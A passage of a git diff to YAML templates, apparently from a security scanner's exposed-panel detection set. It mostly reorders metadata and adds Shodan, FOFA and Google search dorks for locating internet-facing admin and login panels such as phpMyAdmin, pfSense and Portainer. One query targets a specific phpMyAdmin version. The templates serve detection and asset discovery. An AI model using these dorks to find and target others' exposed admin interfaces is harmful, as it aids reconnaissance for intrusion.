fofa-query: app="Panabit-智能网关" max-request: 1 + fofa-query: app="Panabit-智能网关" tags: panabit,panel http: diff --git a/http/exposed-panels/pandora-fms-console.yaml b/http/exposed-panels/pandora-fms-console.yaml index 79d1cbeb9f..1e542de6ac 100644 --- a/http/exposed-panels/pandora-fms-console.yaml +++ b/http/exposed-panels/pandora-fms-console.yaml @@ -13,8 +13,11 @@ info: cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: pandora_fms vendor: pandorafms + product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: panel,edb,pandorafms http: diff --git a/http/exposed-panels/papercut-ng-panel.yaml b/http/exposed-panels/papercut-ng-panel.yaml index 0726e81f5f..dacd7fb781 100644 --- a/http/exposed-panels/papercut-ng-panel.yaml +++ b/http/exposed-panels/papercut-ng-panel.yaml @@ -9,11 +9,20 @@ info: classification: cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: - google-query: html:'content="PaperCut' - max-request: 1 - product: papercut_ng - vendor: papercut verified: true + max-request: 1 + vendor: papercut + product: papercut_ng + google-query: + - html:'content="PaperCut' + - html:'content="papercut' + shodan-query: + - http.html:'content="papercut' + - cpe:"cpe:2.3:a:papercut:papercut_ng" + - http.html:"content=\"papercut\"" + fofa-query: + - body='content="papercut' + - body="content=\"papercut\"" tags: panel,papercut,detect http: diff --git a/http/exposed-panels/parallels/parallels-hsphere-detect.yaml b/http/exposed-panels/parallels/parallels-hsphere-detect.yaml index d3e74122bc..3793ab57e7 100644 --- a/http/exposed-panels/parallels/parallels-hsphere-detect.yaml +++ b/http/exposed-panels/parallels/parallels-hsphere-detect.yaml @@ -10,11 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:parallels:h-sphere:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: h-sphere - shodan-query: title:"Parallels H-Sphere" - vendor: parallels verified: true + max-request: 1 + vendor: parallels + product: h-sphere + shodan-query: + - title:"Parallels H-Sphere" + - http.title:"h-sphere" + - http.title:"parallels h-sphere" + fofa-query: + - title="h-sphere" + - title="parallels h-sphere" + google-query: + - intitle:"h-sphere" + - intitle:"parallels h-sphere" tags: panel,parallels,hsphere http: diff --git a/http/exposed-panels/parse-dashboard.yaml b/http/exposed-panels/parse-dashboard.yaml index c20004c656..174451535d 100644 --- a/http/exposed-panels/parse-dashboard.yaml +++ b/http/exposed-panels/parse-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:parseplatform:parse-server:*:*:*:*:node.js:*:*:* metadata: - max-request: 1 - product: parse-server - shodan-query: title:"Parse Dashboard" - vendor: parseplatform verified: true + max-request: 1 + vendor: parseplatform + product: parse-server + shodan-query: + - title:"Parse Dashboard" + - http.title:"parse dashboard" + fofa-query: title="parse dashboard" + google-query: intitle:"parse dashboard" tags: panel,parse,exposure,parseplatform http: diff --git a/http/exposed-panels/passbolt-panel.yaml b/http/exposed-panels/passbolt-panel.yaml index 06aec42466..66bdcb5061 100644 --- a/http/exposed-panels/passbolt-panel.yaml +++ b/http/exposed-panels/passbolt-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.passbolt.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Passbolt | Open source password manager for teams" - verified: true tags: panel,passbolt,login http: diff --git a/http/exposed-panels/payroll-management-system-panel.yaml b/http/exposed-panels/payroll-management-system-panel.yaml index 3868bdb66d..4794b0b663 100644 --- a/http/exposed-panels/payroll-management-system-panel.yaml +++ b/http/exposed-panels/payroll-management-system-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Admin | Employee's Payroll Management System" - verified: true tags: panel,payroll http: diff --git a/http/exposed-panels/pdi-device-page.yaml b/http/exposed-panels/pdi-device-page.yaml index 4bff88bde9..0399c86419 100644 --- a/http/exposed-panels/pdi-device-page.yaml +++ b/http/exposed-panels/pdi-device-page.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo?fbid=629130339257489&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: html:"PDI Intellifuel" - verified: true tags: exposure,pdi,intellifuel,panel http: diff --git a/http/exposed-panels/pega-web-panel.yaml b/http/exposed-panels/pega-web-panel.yaml index c3197ad73d..f353341671 100644 --- a/http/exposed-panels/pega-web-panel.yaml +++ b/http/exposed-panels/pega-web-panel.yaml @@ -13,12 +13,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:pega:platform:*:*:*:*:*:*:*:* metadata: - google-query: inurl:"/prweb/PRAuth/app/default" - max-request: 2 - product: platform - shodan-query: title:"Pega Platform" - vendor: pega verified: true + max-request: 2 + vendor: pega + product: platform + shodan-query: + - title:"Pega Platform" + - http.title:"pega platform" + google-query: + - inurl:"/prweb/PRAuth/app/default" + - intitle:"pega platform" + - inurl:"/prweb/prauth/app/default" + fofa-query: title="pega platform" tags: panel,pega http: diff --git a/http/exposed-panels/pentaho-panel.yaml b/http/exposed-panels/pentaho-panel.yaml index 492ae799d9..47ae1b6da0 100644 --- a/http/exposed-panels/pentaho-panel.yaml +++ b/http/exposed-panels/pentaho-panel.yaml @@ -11,6 +11,8 @@ info: metadata: max-request: 1 shodan-query: pentaho + product: vantara_pentaho + vendor: hitachi tags: panel,pentaho http: diff --git a/http/exposed-panels/persis-panel.yaml b/http/exposed-panels/persis-panel.yaml index f8f4350986..38ebd8bd61 100644 --- a/http/exposed-panels/persis-panel.yaml +++ b/http/exposed-panels/persis-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"Persis" - verified: true tags: panel,persis http: diff --git a/http/exposed-panels/pfsense-login.yaml b/http/exposed-panels/pfsense-login.yaml index fc13174f08..34e813c7b9 100644 --- a/http/exposed-panels/pfsense-login.yaml +++ b/http/exposed-panels/pfsense-login.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:pfsense:pfsense:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"pfSense - Login" max-request: 1 - product: pfsense - shodan-query: http.title:"pfSense - Login" vendor: pfsense + product: pfsense + shodan-query: + - http.title:"pfSense - Login" + - http.title:"pfsense - login" + google-query: + - intitle:"pfSense - Login" + - intitle:"pfsense - login" + fofa-query: title="pfsense - login" tags: panel,pfsense http: diff --git a/http/exposed-panels/phabricator-login.yaml b/http/exposed-panels/phabricator-login.yaml index 72810d2aa5..d25db54345 100644 --- a/http/exposed-panels/phabricator-login.yaml +++ b/http/exposed-panels/phabricator-login.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:phacility:phabricator:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: phabricator - shodan-query: html:"phabricator-standard-page" vendor: phacility + product: phabricator + shodan-query: + - html:"phabricator-standard-page" + - http.html:"phabricator-standard-page" + fofa-query: body="phabricator-standard-page" tags: panel,phabricator,phacility http: diff --git a/http/exposed-panels/phoronix-pane.yaml b/http/exposed-panels/phoronix-pane.yaml index 60b8ef0b26..336d4d28ac 100644 --- a/http/exposed-panels/phoronix-pane.yaml +++ b/http/exposed-panels/phoronix-pane.yaml @@ -11,9 +11,11 @@ info: cpe: cpe:2.3:a:phoronix-media:phoronix_test_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phoronix-media product: phoronix_test_suite shodan-query: http.title:"phoronix-test-suite" - vendor: phoronix-media + fofa-query: title="phoronix-test-suite" + google-query: intitle:"phoronix-test-suite" tags: panel,phoronix,phoronix-media http: diff --git a/http/exposed-panels/php-mailer.yaml b/http/exposed-panels/php-mailer.yaml index 6b23015726..1e2aa4769a 100644 --- a/http/exposed-panels/php-mailer.yaml +++ b/http/exposed-panels/php-mailer.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"PHP Mailer" - verified: true tags: panel,php,mailer http: diff --git a/http/exposed-panels/phpcollab-panel.yaml b/http/exposed-panels/phpcollab-panel.yaml index b664f552fc..d2d304d7b2 100644 --- a/http/exposed-panels/phpcollab-panel.yaml +++ b/http/exposed-panels/phpcollab-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: phpcollab - shodan-query: http.title:"PhpCollab" vendor: phpcollab + product: phpcollab + shodan-query: + - http.title:"PhpCollab" + - http.title:"phpcollab" + fofa-query: title="phpcollab" + google-query: intitle:"phpcollab" tags: panel,phpcollab,login http: diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml index 06aefcc8ee..209abf647c 100644 --- a/http/exposed-panels/phpldapadmin-panel.yaml +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -5,9 +5,9 @@ info: author: ritikchaddha,DhiyaneshDk severity: info metadata: + verified: true max-request: 3 shodan-query: title:"phpLDAPadmin" - verified: true tags: php,phpldapadmin,panel,detect http: diff --git a/http/exposed-panels/phpminiadmin-panel.yaml b/http/exposed-panels/phpminiadmin-panel.yaml index de8aa32c11..d43473a017 100644 --- a/http/exposed-panels/phpminiadmin-panel.yaml +++ b/http/exposed-panels/phpminiadmin-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"phpMiniAdmin" - verified: true tags: panel,phpminiadmin http: diff --git a/http/exposed-panels/phpmyadmin-panel.yaml b/http/exposed-panels/phpmyadmin-panel.yaml index 0147c6c7e9..7f8029a89f 100644 --- a/http/exposed-panels/phpmyadmin-panel.yaml +++ b/http/exposed-panels/phpmyadmin-panel.yaml @@ -10,10 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: - max-request: 13 - product: phpmyadmin - shodan-query: http.title:phpMyAdmin + max-request: 14 vendor: phpmyadmin + product: phpmyadmin + shodan-query: + - "http.title:phpMyAdmin" + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - body="pma_servername" && body="4.8.4" + - title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: panel,phpmyadmin http: diff --git a/http/exposed-panels/phppgadmin-panel.yaml b/http/exposed-panels/phppgadmin-panel.yaml index 1c830ef551..c57319b422 100644 --- a/http/exposed-panels/phppgadmin-panel.yaml +++ b/http/exposed-panels/phppgadmin-panel.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: phppgadmin - shodan-query: http.title:phpPgAdmin - vendor: phppgadmin_project verified: true + max-request: 2 + vendor: phppgadmin_project + product: phppgadmin + shodan-query: + - http.title:phpPgAdmin + - http.title:phppgadmin + - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" + fofa-query: title=phppgadmin + google-query: intitle:phppgadmin tags: panel,phppgadmin,phppgadmin_project http: diff --git a/http/exposed-panels/pichome-panel.yaml b/http/exposed-panels/pichome-panel.yaml index 27079c524a..14846c0a7c 100644 --- a/http/exposed-panels/pichome-panel.yaml +++ b/http/exposed-panels/pichome-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:933976300 - verified: true tags: pichome,panel http: diff --git a/http/exposed-panels/piwigo-panel.yaml b/http/exposed-panels/piwigo-panel.yaml index 7f850c402c..9f6564a5ad 100644 --- a/http/exposed-panels/piwigo-panel.yaml +++ b/http/exposed-panels/piwigo-panel.yaml @@ -10,13 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: - fofa-query: title="piwigo" - google-query: Powered by Piwigo + verified: true max-request: 2 + vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 - vendor: piwigo - verified: true + fofa-query: + - title="piwigo" + - icon_hash=540706145 + google-query: + - Powered by Piwigo + - powered by piwigo tags: panel,piwigo,detect http: diff --git a/http/exposed-panels/planet-estream-panel.yaml b/http/exposed-panels/planet-estream-panel.yaml index 8d347f0d44..6fda588f21 100644 --- a/http/exposed-panels/planet-estream-panel.yaml +++ b/http/exposed-panels/planet-estream-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:planetestream:planet_estream:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: planet_estream - shodan-query: title:"Login - Planet eStream" - vendor: planetestream verified: true + max-request: 1 + vendor: planetestream + product: planet_estream + shodan-query: + - title:"Login - Planet eStream" + - http.title:"login - planet estream" + fofa-query: title="login - planet estream" + google-query: intitle:"login - planet estream" tags: panel,planet,estream,planetestream http: diff --git a/http/exposed-panels/plausible-panel.yaml b/http/exposed-panels/plausible-panel.yaml index 274c5c3b99..435291d7a4 100644 --- a/http/exposed-panels/plausible-panel.yaml +++ b/http/exposed-panels/plausible-panel.yaml @@ -10,9 +10,9 @@ info: - https://plausible.io/ - https://github.com/plausible/analytics metadata: + verified: true max-request: 1 shodan-query: html:"Plausible" - verified: true tags: panel,plausible,detect http: diff --git a/http/exposed-panels/plesk-obsidian-login.yaml b/http/exposed-panels/plesk-obsidian-login.yaml index ad638f0726..17fa1dfccd 100644 --- a/http/exposed-panels/plesk-obsidian-login.yaml +++ b/http/exposed-panels/plesk-obsidian-login.yaml @@ -10,11 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: obsidian - shodan-query: http.html:"Plesk Obsidian" - vendor: plesk verified: true + max-request: 1 + vendor: plesk + product: obsidian + shodan-query: + - http.html:"Plesk Obsidian" + - http.html:"plesk obsidian" + - http.title:"plesk obsidian" + fofa-query: + - body="plesk obsidian" + - title="plesk obsidian" + google-query: intitle:"plesk obsidian" tags: panel,plesk,login,edb http: diff --git a/http/exposed-panels/plesk-onyx-login.yaml b/http/exposed-panels/plesk-onyx-login.yaml index 6cb3338a39..3e5498da68 100644 --- a/http/exposed-panels/plesk-onyx-login.yaml +++ b/http/exposed-panels/plesk-onyx-login.yaml @@ -13,12 +13,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:plesk:onyx:*:*:*:*:*:*:*:* metadata: - google-query: inurl:login_up.php "Plesk Onyx" - max-request: 1 - product: onyx - shodan-query: http.html:"Plesk Onyx" http.html:"plesk-build" - vendor: plesk verified: true + max-request: 1 + vendor: plesk + product: onyx + shodan-query: + - http.html:"Plesk Onyx" http.html:"plesk-build" + - http.html:"plesk onyx" http.html:"plesk-build" + google-query: + - inurl:login_up.php "Plesk Onyx" + - inurl:login_up.php "plesk onyx" + fofa-query: body="plesk onyx" http.html:"plesk-build" tags: panel,plesk,login,edb http: diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 83b7338994..94ce9a6331 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -1,20 +1,20 @@ id: pocketbase-panel -info: - name: PocketBase Panel - Detect - author: userdehghani - severity: info - description: | - PocketBase Login panel was discovered. - reference: - - https://pocketbase.io/ - - https://pocketbase.io/docs/ - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:981081715 - tags: panel,pocketbase,login,detect - +info: + name: PocketBase Panel - Detect + author: userdehghani + severity: info + description: | + PocketBase Login panel was discovered. + reference: + - https://pocketbase.io/ + - https://pocketbase.io/docs/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:981081715 + tags: panel,pocketbase,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/polycom-admin-detect.yaml b/http/exposed-panels/polycom-admin-detect.yaml index 8031b324f9..a4b238ae62 100644 --- a/http/exposed-panels/polycom-admin-detect.yaml +++ b/http/exposed-panels/polycom-admin-detect.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:h:polycom:vvx:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: vvx vendor: polycom + product: vvx tags: panel,polycom http: diff --git a/http/exposed-panels/portainer-panel.yaml b/http/exposed-panels/portainer-panel.yaml index fbcd2cb197..db9ea1d418 100644 --- a/http/exposed-panels/portainer-panel.yaml +++ b/http/exposed-panels/portainer-panel.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:a:portainer:portainer:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: portainer - shodan-query: title:"Portainer" - vendor: portainer verified: true + max-request: 2 + vendor: portainer + product: portainer + shodan-query: + - title:"Portainer" + - http.title:"portainer" + fofa-query: title="portainer" + google-query: intitle:"portainer" tags: panel,portainer,detect http: diff --git a/http/exposed-panels/posteio-admin-panel.yaml b/http/exposed-panels/posteio-admin-panel.yaml index ecb59d395e..8459343b6f 100644 --- a/http/exposed-panels/posteio-admin-panel.yaml +++ b/http/exposed-panels/posteio-admin-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Poste.io login panel was detected. metadata: + verified: true max-request: 1 shodan-query: title:"Administration login" html:"posteSatis" - verified: true tags: panel,exposure,composer,satis http: diff --git a/http/exposed-panels/sauter-moduwebvision-panel.yaml b/http/exposed-panels/sauter-moduwebvision-panel.yaml index 6b59e0bceb..72b2f942c8 100644 --- a/http/exposed-panels/sauter-moduwebvision-panel.yaml +++ b/http/exposed-panels/sauter-moduwebvision-panel.yaml @@ -11,11 +11,12 @@ info: classification: cpe: cpe:2.3:o:sauter:moduweb_vision:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: sauter product: moduweb_vision shodan-query: http.favicon.hash:-1663319756 - vendor: sauter - verified: true + fofa-query: icon_hash=-1663319756 tags: panel,moduweb,sauter,login http: diff --git a/http/exposed-panels/scribble-diffusion-panel.yaml b/http/exposed-panels/scribble-diffusion-panel.yaml index cd82d5f1be..5b855d2234 100644 --- a/http/exposed-panels/scribble-diffusion-panel.yaml +++ b/http/exposed-panels/scribble-diffusion-panel.yaml @@ -10,9 +10,9 @@ info: - https://scribblediffusion.com/ - https://github.com/replicate/scribble-diffusion metadata: + verified: true max-request: 1 shodan-query: title:"Scribble Diffusion" - verified: true tags: panel,scribble,detect http: diff --git a/http/exposed-panels/scriptcase/scriptcase-panel.yaml b/http/exposed-panels/scriptcase/scriptcase-panel.yaml index e0bee62fed..deb66881f1 100644 --- a/http/exposed-panels/scriptcase/scriptcase-panel.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-panel.yaml @@ -8,9 +8,9 @@ info: - https://www.scriptcase.com.br - https://www.scriptcase.net metadata: + verified: true max-request: 2 shodan-query: title:"ScriptCase" - verified: true tags: panel,scriptcase http: diff --git a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml index 409fdb226b..9f93bb0cec 100644 --- a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml @@ -8,9 +8,9 @@ info: - https://www.scriptcase.com.br - https://www.scriptcase.net metadata: + verified: true max-request: 2 shodan-query: title:"ScriptCase" - verified: true tags: panel,scriptcase http: diff --git a/http/exposed-panels/seafile-panel.yaml b/http/exposed-panels/seafile-panel.yaml index 5dacf3c210..78d80c6de6 100644 --- a/http/exposed-panels/seafile-panel.yaml +++ b/http/exposed-panels/seafile-panel.yaml @@ -13,11 +13,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: seafile product: seafile shodan-query: http.favicon.hash:1552322396 - vendor: seafile - verified: true + fofa-query: icon_hash=1552322396 tags: sefile,panel,login,seafile http: diff --git a/http/exposed-panels/seagate-nas-login.yaml b/http/exposed-panels/seagate-nas-login.yaml index de1d440413..83a1befd5c 100644 --- a/http/exposed-panels/seagate-nas-login.yaml +++ b/http/exposed-panels/seagate-nas-login.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:o:seagate:nas_os:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: nas_os - shodan-query: title:"Seagate NAS - SEAGATE" - vendor: seagate verified: true + max-request: 1 + vendor: seagate + product: nas_os + shodan-query: + - title:"Seagate NAS - SEAGATE" + - http.title:"seagate nas - seagate" + fofa-query: title="seagate nas - seagate" + google-query: intitle:"seagate nas - seagate" tags: panel,seagate,login http: diff --git a/http/exposed-panels/securepoint-utm.yaml b/http/exposed-panels/securepoint-utm.yaml index 8449277ba4..3dade8ffe1 100644 --- a/http/exposed-panels/securepoint-utm.yaml +++ b/http/exposed-panels/securepoint-utm.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8" max-request: 1 + fofa-query: app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8" tags: securepoint,panel http: diff --git a/http/exposed-panels/security-onion-panel.yaml b/http/exposed-panels/security-onion-panel.yaml index 3c2307944c..5baefacb5d 100644 --- a/http/exposed-panels/security-onion-panel.yaml +++ b/http/exposed-panels/security-onion-panel.yaml @@ -12,11 +12,15 @@ info: classification: cpe: cpe:2.3:a:securityonionsolutions:security_onion:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: security_onion - shodan-query: title:"Security Onion" - vendor: securityonionsolutions verified: true + max-request: 2 + vendor: securityonionsolutions + product: security_onion + shodan-query: + - title:"Security Onion" + - http.title:"security onion" + fofa-query: title="security onion" + google-query: intitle:"security onion" tags: panel,security,onion,detect,securityonionsolutions http: diff --git a/http/exposed-panels/seeddms-panel.yaml b/http/exposed-panels/seeddms-panel.yaml index ed9b4cdd1b..fb8ccbbbfa 100644 --- a/http/exposed-panels/seeddms-panel.yaml +++ b/http/exposed-panels/seeddms-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:seeddms:seeddms:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: seeddms - shodan-query: http.title:"SeedDMS" vendor: seeddms + product: seeddms + shodan-query: + - http.title:"SeedDMS" + - http.title:"seeddms" + fofa-query: title="seeddms" + google-query: intitle:"seeddms" tags: panel,seeddms,login http: diff --git a/http/exposed-panels/selfcheck-panel.yaml b/http/exposed-panels/selfcheck-panel.yaml index 25f0b92ed4..902c04320f 100644 --- a/http/exposed-panels/selfcheck-panel.yaml +++ b/http/exposed-panels/selfcheck-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=607747024729154&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"SelfCheck System Manager" - verified: true tags: panel,login,selfcheck,systemmanager http: diff --git a/http/exposed-panels/sensu-panel.yaml b/http/exposed-panels/sensu-panel.yaml index 07406e17af..e788b6b0ce 100644 --- a/http/exposed-panels/sensu-panel.yaml +++ b/http/exposed-panels/sensu-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-749942143 - verified: true tags: panel,sensu,sumo,detect http: diff --git a/http/exposed-panels/sentinelone-console.yaml b/http/exposed-panels/sentinelone-console.yaml index 04f8804a28..a42e103b45 100644 --- a/http/exposed-panels/sentinelone-console.yaml +++ b/http/exposed-panels/sentinelone-console.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"SentinelOne - Management Console" - verified: true tags: panel,sentinelone http: diff --git a/http/exposed-panels/sentry-panel.yaml b/http/exposed-panels/sentry-panel.yaml index 3f83839c75..4b4a63b8f3 100644 --- a/http/exposed-panels/sentry-panel.yaml +++ b/http/exposed-panels/sentry-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:sentry:sentry:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: sentry - shodan-query: http.title:"Login | Sentry" - vendor: sentry verified: true + max-request: 1 + vendor: sentry + product: sentry + shodan-query: + - http.title:"Login | Sentry" + - http.title:"login | sentry" + fofa-query: title="login | sentry" + google-query: intitle:"login | sentry" tags: panel,sentry,login http: diff --git a/http/exposed-panels/servicedesk-login-panel.yaml b/http/exposed-panels/servicedesk-login-panel.yaml index 950e2fcd96..ea27418e3e 100644 --- a/http/exposed-panels/servicedesk-login-panel.yaml +++ b/http/exposed-panels/servicedesk-login-panel.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" vendor: atlassian + product: confluence_data_center + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" + fofa-query: app="atlassian-confluence" tags: servicedesk,confluence,jira,panel,login,atlassian http: diff --git a/http/exposed-panels/servicenow-panel.yaml b/http/exposed-panels/servicenow-panel.yaml index d47d46b38e..6b33e2d9c2 100644 --- a/http/exposed-panels/servicenow-panel.yaml +++ b/http/exposed-panels/servicenow-panel.yaml @@ -11,11 +11,17 @@ info: classification: cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: servicenow - shodan-query: http.favicon.hash:1701804003 - vendor: servicenow verified: true + max-request: 1 + vendor: servicenow + product: servicenow + shodan-query: + - http.favicon.hash:1701804003 + - http.title:"servicenow" + fofa-query: + - icon_hash=1701804003 + - title="servicenow" + google-query: intitle:"servicenow" tags: panel,servicenow,login,detect http: diff --git a/http/exposed-panels/sevone-nms-network-manager.yaml b/http/exposed-panels/sevone-nms-network-manager.yaml index 4f4e788d9b..250adc55de 100644 --- a/http/exposed-panels/sevone-nms-network-manager.yaml +++ b/http/exposed-panels/sevone-nms-network-manager.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info metadata: + verified: true max-request: 1 shodan-query: http.title:"SevOne NMS - Network Manager" - verified: true tags: sevone,manager,login,panel http: diff --git a/http/exposed-panels/shardingsphere-panel.yaml b/http/exposed-panels/shardingsphere-panel.yaml index 47f423d646..51f3a7155e 100644 --- a/http/exposed-panels/shardingsphere-panel.yaml +++ b/http/exposed-panels/shardingsphere-panel.yaml @@ -9,11 +9,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 - vendor: apache - verified: true + fofa-query: icon_hash=816588900 tags: panel,shardingsphere,login,apache http: diff --git a/http/exposed-panels/sharefile-panel.yaml b/http/exposed-panels/sharefile-panel.yaml index 65374a329a..2478df980e 100644 --- a/http/exposed-panels/sharefile-panel.yaml +++ b/http/exposed-panels/sharefile-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:citrix:sharefile:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: sharefile - shodan-query: title:"ShareFile Login" - vendor: citrix verified: true + max-request: 1 + vendor: citrix + product: sharefile + shodan-query: + - title:"ShareFile Login" + - http.title:"sharefile login" + fofa-query: title="sharefile login" + google-query: intitle:"sharefile login" tags: sharefile,login,panel,detect,citrix http: diff --git a/http/exposed-panels/shell-box.yaml b/http/exposed-panels/shell-box.yaml index 68e0119148..1cc88918cc 100644 --- a/http/exposed-panels/shell-box.yaml +++ b/http/exposed-panels/shell-box.yaml @@ -12,11 +12,12 @@ info: classification: cpe: cpe:2.3:a:shellinabox_project:shellinabox:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: shellinabox_project product: shellinabox shodan-query: http.favicon.hash:-629968763 - vendor: shellinabox_project - verified: true + fofa-query: icon_hash=-629968763 tags: shell,emulator,detect,panel,login,shellinabox_project http: diff --git a/http/exposed-panels/sidekiq-dashboard.yaml b/http/exposed-panels/sidekiq-dashboard.yaml index 2aab862f59..92ecf87cfd 100644 --- a/http/exposed-panels/sidekiq-dashboard.yaml +++ b/http/exposed-panels/sidekiq-dashboard.yaml @@ -16,8 +16,11 @@ info: cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sidekiq vendor: contribsys + product: sidekiq + fofa-query: title="sidekiq" + shodan-query: http.title:"sidekiq" + google-query: intitle:"sidekiq" tags: unauth,panel,sidekiq,contribsys http: diff --git a/http/exposed-panels/signet-explorer-dashboard.yaml b/http/exposed-panels/signet-explorer-dashboard.yaml index a50f9799e2..49dabc216e 100644 --- 